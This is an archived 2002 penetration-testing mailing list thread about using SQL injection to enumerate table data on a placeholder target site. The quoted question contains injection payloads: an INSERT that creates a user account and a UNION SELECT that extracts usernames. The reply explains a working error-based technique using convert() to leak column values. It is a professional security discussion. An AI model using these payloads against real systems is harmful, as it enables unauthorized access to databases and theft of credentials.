Penetration Testing mailing list archives
Re: sql table data enumeration help please.
From: "Kevin Spett" <kspett () spidynamics com>
Date: Thu, 9 May 2002 22:38:03 -0700
----- Original Message ----- From: "Gary O'leary-Steele" <GaryO () sec-1 com> To: <pen-test () securityfocus com> Sent: Thursday, May 09, 2002 12:47 PM Subject: sql table data enumeration help please.
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct
31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo () sec-1 com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--
Did you get an error message of some kind? Try using a semicolon after the username close quote and doing the INSERT in its own line.
In an attempt to gain access to data held with the username and password fields I have tried www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--&password=hacker but get "Operand type clash: uniqueidentifier is incompatible with int"
This usually means that the column that you have use to inject (the ninth, in this case) is an int column in the original SELECT statement. The UNION SELECT column must have the same data type. Try using the convert() hack to get around this whole issue, like this: username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM tblUsers WHERE Username > 'a')) + ''-- You should get an error message back complaining about type conversion, which includes the returned value from your subselect. Kevin. SPI Dynamics, Inc. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- sql table data enumeration help please. Gary O'leary-Steele (May 09)
- Re: sql table data enumeration help please. Kevin Spett (May 10)
- Re: sql table data enumeration help please. Deus, Attonbitus (May 13)
- Re: sql table data enumeration help please. Kevin Spett (May 10)